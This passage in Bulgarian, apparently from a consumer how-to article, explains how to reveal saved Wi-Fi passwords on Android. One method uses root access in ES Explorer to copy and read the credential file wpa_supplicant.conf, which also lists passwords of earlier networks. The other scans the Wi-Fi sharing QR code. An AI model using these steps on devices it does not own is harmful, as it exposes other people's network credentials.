По подразбиране ROOT достъпът в ES Explorer е деактивиран; можете да го активирате в страничната лента на менюто на приложението. Между другото, ако не знаете дали ROOT е инсталиран на вашето устройство, когато се опитате да активирате този ES режим, Explorer ще ви уведоми за това. Ако ROOT не е инсталиран в системата, приложението ще издаде предупреждение и ако е инсталирано, ще се появи заявка за разрешение за предоставяне на ROOT права на приложението ES Explorer, в което трябва да кликнете върху бутона "GRANTE" .

В същата странична лента щракнете върху „Local Storage > Device“, отидете в директорията „/data/misc/wifi“ и намерете файла „wpa_supplicant.conf“.

Най-вероятно няма да можете да отворите този файл на посоченото място поради ограничения на правата за достъп. Не се променя системен файл, натиснете и задръжте, докато зелената отметка до него светне. Кликнете върху елемента „Още“ в долната част на екрана и изберете „Копиране в“ от списъка, който се отваря. По подразбиране приложението ще предложи копиране в корена на картата с памет или външна паметустройство (пътят е посочен в горната част на прозореца за копиране).

Щракнете върху OK и отидете на посоченото място, щракнете върху копието на файла "wpa_supplicant.conf" и изберете "ES Editor" в изскачащия прозорец "Select". Намерете в текста блок за мрежата, за която искате да разберете паролата.

Както можете да видите, можете да разберете паролата не само за текущата, но и за предишни свързани мрежи.

Метод 3 (без ROOT)

Можете да инсталирате приложение за четене на QR кодове, например, на друг телефон, който трябва да бъде свързан към Wi-Fi мрежа, и да сканирате кода.

Ако трябва да видите паролата, на същото телефони XiaomiИма вградено приложение за скенер, което ви позволява да сканирате кодове от изображения. Направете екранна снимка на QR кода (бутони "Volume -" + "On/Off") и го отворете с помощта на програмата "Scanner". Приложението ще сканира снимката и ще покаже резултата. По подразбиране паролата се показва като звездички, докоснете я, за да се покаже.

Ако телефонът ви няма предварително инсталирано приложение"Скенер", можете да сканирате снимка с помощта на приложението от Google Play Store - "QR Code Reader Extreme".

Публикации по темата